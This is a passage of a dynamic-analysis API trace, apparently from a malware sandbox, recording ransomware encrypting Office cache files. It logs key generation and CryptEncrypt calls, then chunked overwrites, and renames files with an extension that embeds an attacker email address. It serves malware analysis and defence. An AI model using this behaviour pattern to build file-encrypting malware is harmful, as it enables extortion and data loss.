	[0085.061] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.063] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.063] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.063] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.063] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.068] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000
	[0085.068] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.072] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.072] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.073] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.073] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.087] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000
	[0085.087] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.090] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.090] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0085.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3d30020 | out: hHeap=0x540000) returned 1
	[0085.099] CloseHandle (hObject=0x494) returned 1
	[0085.443] GetProcessHeap () returned 0x540000
	[0085.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0085.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0085.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0085.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc178 | out: hHeap=0x540000) returned 1
	[0085.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc0d0 | out: hHeap=0x540000) returned 1
	[0085.443] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc0d0
	[0085.443] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0085.443] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0085.443] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0085.443] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0085.443] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", dwFileAttributes=0x80) returned 1
	[0085.445] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 78
	[0085.445] GetProcessHeap () returned 0x540000
	[0085.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb580
	[0085.445] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml"
	[0085.445] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0085.445] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0085.447] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0085.447] GetProcessHeap () returned 0x540000
	[0085.447] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0085.447] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=16852) returned 1
	[0085.447] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x41d4
	[0085.447] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0085.447] GetProcessHeap () returned 0x540000
	[0085.447] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0085.447] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0085.447] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0085.451] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0085.451] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.451] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x41d4) returned 0x5fdb78
	[0085.451] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x41d4) returned 0x601d58
	[0085.451] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0085.451] ReadFile (in: hFile=0x494, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x41d4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x41d4, lpOverlapped=0x0) returned 1
	[0085.453] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0085.453] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0085.453] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", dwFileAttributes=0x80) returned 1
	[0085.453] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 78
	[0085.453] GetProcessHeap () returned 0x540000
	[0085.453] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb580
	[0085.453] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi"
	[0085.454] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0085.454] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0085.456] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0085.456] GetProcessHeap () returned 0x540000
	[0085.456] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0085.456] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=27532288) returned 1
	[0085.456] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1a41c00
	[0085.456] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0085.456] GetProcessHeap () returned 0x540000
	[0085.456] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0085.457] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0085.457] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0085.459] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0085.459] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.459] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1a41c00) returned 0x3c20020
	[0085.460] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1a41c00) returned 0x5670020
	[0085.461] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0085.461] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1a41c00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1a41c00, lpOverlapped=0x0) returned 1
	[0087.256] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0087.256] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0087.256] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1
	[0087.257] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88
	[0087.257] GetProcessHeap () returned 0x540000
	[0087.257] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x116) returned 0x5fb648
	[0087.257] lstrcpyW (in: lpString1=0x5fb648, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms"
	[0087.257] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0087.257] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0087.260] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0087.260] GetProcessHeap () returned 0x540000
	[0087.260] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb648 | out: hHeap=0x540000) returned 1
	[0087.260] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=715834) returned 1
	[0087.260] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xaec3a
	[0087.260] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0087.261] GetProcessHeap () returned 0x540000
	[0087.261] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0087.261] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0087.261] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0087.267] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0087.267] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0087.267] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x3010020
	[0087.268] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x35e0020
	[0087.268] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0087.268] ReadFile (in: hFile=0x494, lpBuffer=0x3010020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3010020*, lpNumberOfBytesRead=0x3a1f778*=0xaec3a, lpOverlapped=0x0) returned 1
	[0087.302] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0087.302] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0087.302] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1
	[0087.303] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75
	[0087.303] GetProcessHeap () returned 0x540000
	[0087.303] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0087.303] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll"
	[0087.303] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0087.303] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0087.305] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0087.305] GetProcessHeap () returned 0x540000
	[0087.305] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0087.305] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1463568) returned 1
	[0087.305] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x165510
	[0087.305] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0087.305] GetProcessHeap () returned 0x540000
	[0087.305] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0087.305] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0087.305] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0087.307] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0087.307] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0087.307] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3c20020
	[0087.308] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3d90020
	[0087.308] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0087.308] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x165510, lpOverlapped=0x0) returned 1
	[0087.390] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0087.390] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0087.390] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1
	[0087.392] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76
	[0087.392] GetProcessHeap () returned 0x540000
	[0087.392] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0087.392] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab"
